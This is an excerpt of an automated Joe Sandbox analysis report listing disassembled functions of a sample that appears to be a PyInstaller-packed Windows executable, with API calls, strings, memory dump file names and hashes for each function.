Instruction Fuzzy Hash: EA816E71A0EA8696FB70EB34D0452F9B3A0AF88784FC4447DE98D47785DE3CE5868760

Function 00007FF79A311600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fseek, xrefs: 00007FF79A3116E1
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF79A311742
malloc, xrefs: 00007FF79A311749
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF79A3117DF
Failed to extract %s: failed to open target file!, xrefs: 00007FF79A31165C
Failed to extract %s: failed to open archive file!, xrefs: 00007FF79A3116A2
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF79A3117CA
fopen, xrefs: 00007FF79A311663
fwrite, xrefs: 00007FF79A3117D1
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF79A3116DA
fread, xrefs: 00007FF79A3117E6
Failed to create symbolic link %s!, xrefs: 00007FF79A311622

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
Instruction ID: 57a7ce00745ea4ec7df5c83e4442928506d51b162e536e70684c4233251c69a2
Opcode Fuzzy Hash: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
Instruction Fuzzy Hash: 80516861F0A64292FA20FB71A4001B9F3A0BF84798FC445BEEE1D07796EE3CE5558760

Function 00007FF79A318850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF79A313CBB), ref: 00007FF79A3188F4
GetCurrentProcessId.KERNEL32(?,00000000,00007FF79A313CBB), ref: 00007FF79A3188FA
CreateDirectoryW.KERNELBASE(?,00000000,00007FF79A313CBB), ref: 00007FF79A31893C

Part of subcall function 00007FF79A318A20: GetEnvironmentVariableW.KERNEL32(00007FF79A31388E), ref: 00007FF79A318A57
Part of subcall function 00007FF79A318A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF79A318A79

Part of subcall function 00007FF79A3282A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3282C1

Part of subcall function 00007FF79A312810: MessageBoxW.USER32 ref: 00007FF79A3128EA

Strings

_MEI%d, xrefs: 00007FF79A318902
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF79A31896E
LOADER: failed to set the TMP environment variable., xrefs: 00007FF79A3188CC
TMP, xrefs: 00007FF79A31888C, 00007FF79A318993
TMP, xrefs: 00007FF79A3188B2

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
Instruction ID: 92834b5379f009da7cd5e9f734dce4119e060e99588c96a2d9a013f169ec9d6b
Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
Instruction Fuzzy Hash: 7F41BE11B0B64251FA30FB32A8552F9B291AF89BC4FC002BDED0D4779AEE3CE5018760

Function 00007FF79A311210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

malloc, xrefs: 00007FF79A3112C1, 00007FF79A3112F6
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF79A31141E
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF79A311276
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF79A3112BA
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF79A3112EF
1.3.1, xrefs: 00007FF79A311249

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
Instruction ID: 9cdb12622e3148e02a00d8b745e59fab0dcd56885ffe48e76a50b76ddae2c995
Opcode Fuzzy Hash: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
Instruction Fuzzy Hash: DF519F22A0A64285FA70FB32A4503BAF291EF85B94FC4457DED4D477D9EE3CE5058720

Function 00007FF79A32ED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF79A32F11A,?,?,-00000018,00007FF79A32ADC3,?,?,?,00007FF79A32ACBA,?,?,?,00007FF79A325FAE), ref: 00007FF79A32EEFC
GetProcAddress.KERNEL32(?,?,?,00007FF79A32F11A,?,?,-00000018,00007FF79A32ADC3,?,?,?,00007FF79A32ACBA,?,?,?,00007FF79A325FAE), ref: 00007FF79A32EF08

Strings

ext-ms-, xrefs: 00007FF79A32EE59
api-ms-, xrefs: 00007FF79A32EE46

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction ID: ea1248759f8e7edf585890b3fb33f1e4769a3801da29d36e3f60c88f36506d56
Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction Fuzzy Hash: 1E41F221B1AA1241FA35EB32A804575B791BF49BA4FE8417DED1D47784EF3CE4048360

Function 00007FF79A3136B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF79A313804), ref: 00007FF79A3136E1
GetLastError.KERNEL32(?,00007FF79A313804), ref: 00007FF79A3136EB

Part of subcall function 00007FF79A312C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF79A313706,?,00007FF79A313804), ref: 00007FF79A312C9E
Part of subcall function 00007FF79A312C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF79A313706,?,00007FF79A313804), ref: 00007FF79A312D63
Part of subcall function 00007FF79A312C50: MessageBoxW.USER32 ref: 00007FF79A312D99

Strings

Failed to obtain executable path., xrefs: 00007FF79A3136F3
\\?\, xrefs: 00007FF79A31375A
Failed to resolve full path to executable %ls., xrefs: 00007FF79A313739
Failed to convert executable path to UTF-8., xrefs: 00007FF79A313790
GetModuleFileNameW, xrefs: 00007FF79A3136FA

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction ID: 5a229fdd7c3bb9797aaf822313a529a280b8426934195dd4ae7486ff112769f0
Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction Fuzzy Hash: 19214F61F1E64291FA71FB31E8553B6B290BF88394FC041BEE65D825D5EE2CE509C720

Function 00007FF79A32BACC Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A32BEF9

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
Instruction ID: 11b114a80602d514dd58e9dceae7d7d1c247fc3b977190388b0f37f93051e6a6
Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
Instruction Fuzzy Hash: 99C1C32290E78692F770AF3594482BDB764EB81B80FD541BDEE4E077A5CE7CE8458720

Function 00007FF79A318760 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF79A318780
OpenProcessToken.ADVAPI32 ref: 00007FF79A318793
GetTokenInformation.KERNELBASE ref: 00007FF79A3187B8
GetLastError.KERNEL32 ref: 00007FF79A3187C2
GetTokenInformation.KERNELBASE ref: 00007FF79A318802
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF79A31881E
CloseHandle.KERNEL32 ref: 00007FF79A318836

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
Instruction ID: dd8c85cd44562e659655ac29c99e1bc5d5451cfb855f5b8be24bd74d21e16da3
Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
Instruction Fuzzy Hash: E8215E31E0D64242FB20AB75F49422AF7A1FB857A0F90427DEAAD43AE8DF6CD4448710

Function 00007FF79A3190E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF79A318760: GetCurrentProcess.KERNEL32 ref: 00007FF79A318780
Part of subcall function 00007FF79A318760: OpenProcessToken.ADVAPI32 ref: 00007FF79A318793
Part of subcall function 00007FF79A318760: GetTokenInformation.KERNELBASE ref: 00007FF79A3187B8
Part of subcall function 00007FF79A318760: GetLastError.KERNEL32 ref: 00007FF79A3187C2
Part of subcall function 00007FF79A318760: GetTokenInformation.KERNELBASE ref: 00007FF79A318802
Part of subcall function 00007FF79A318760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF79A31881E
Part of subcall function 00007FF79A318760: CloseHandle.KERNEL32 ref: 00007FF79A318836

LocalFree.KERNEL32(?,00007FF79A313C55), ref: 00007FF79A31916C
LocalFree.KERNEL32(?,00007FF79A313C55), ref: 00007FF79A319175

Strings

Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF79A319183
D:(A;;FA;;;%s), xrefs: 00007FF79A319157
S-1-3-4, xrefs: 00007FF79A319121
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF79A319142

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
Instruction ID: 20e327d6d17f214a5e18aba345cb5dd2f49317a5bb8afa184f016e94d62aa5ab
Opcode Fuzzy Hash: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
Instruction Fuzzy Hash: 2E214B21A0E74282F660FB31E9152EAB3A4EF88780FC444BDEA4D53796DF3CD8458760

Function 00007FF79A32CFD0 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79A32CFBB), ref: 00007FF79A32D0EC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79A32CFBB), ref: 00007FF79A32D177

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction ID: 6995a6c4d7836f3c3ade9fecc8060f629bbd5eb12901d578d04cdac9b6905bf3
Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction Fuzzy Hash: B091B322E1A65189F7B0AF7594402BDBBA0FB44BC8F94417DDE4E57A95CF38E442C720

Function 00007FF79A325698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3256C5
CreateFileW.KERNELBASE ref: 00007FF79A325704
CloseHandle.KERNEL32 ref: 00007FF79A325739

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction ID: 99208a7bd62d03fe223c48bba9b6c9d1b163a6a2775e67259bef1c964edd8153
Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction Fuzzy Hash: 2541A122D1978283F360AB319654379B260FB947A4F50937DEA9C03ED6DF7CA5E08760

Function 00007FF79A31CCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF79A31CE7C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF79A31CE90

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF79A31CCD0
__scrt_release_startup_lock.LIBCMT ref: 00007FF79A31CD3E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF79A31CD91

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction ID: b07bad99604f84b8c779a92eeb66fd4874df6644f4aadefcc57f7713f9911625
Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction Fuzzy Hash: C4311721E0E24256FA74FB7594A23B9B791AF42384FC408BDE94E472D7DE2CA815C271

Function 00007FF79A329AA0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF79A329A9C), ref: 00007FF79A329AB1
TerminateProcess.KERNEL32(?,?,?,00007FF79A329A9C), ref: 00007FF79A329ABC
ExitProcess.KERNEL32 ref: 00007FF79A329ACB

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction ID: 08fbc2ff85ad6a70034286207cca278b386162a0b937e02e454389af550659a5
Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction Fuzzy Hash: 7ED06C10F0A74A42FA283F745899078B251AF48B42BD414BCED0B46393ED6DA8498320

Function 00007FF79A3201AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3201F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3202E7

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction ID: d8b417cf92a97ddbce5fa69e19d74c33bcd8ac60ee2922ea736eb7179b7db9aa
Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction Fuzzy Hash: 6D51E661B0B24296F738BE36940067AF291AF46BA4F94477DEE6C437C5CF3CE9058620

Function 00007FF79A32C1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF79A32C33D), ref: 00007FF79A32C1F0
GetLastError.KERNEL32(?,?,?,?,?,00007FF79A32C33D), ref: 00007FF79A32C1FA

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction ID: 82133781b8d66feb67c9cea04e4113c02db0436d525814eb16ac41e1d313143c
Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction Fuzzy Hash: BA110161A09B8181EA20AB35B814069F361BB81BF0F94437DEE7D4B7E8CF3CE0018700

Function 00007FF79A32A9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9CE
GetLastError.KERNEL32(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9D8

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction ID: aca873f911cabe20a60e08cdb733db224169bb6a783f222007ff70efc026313b
Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
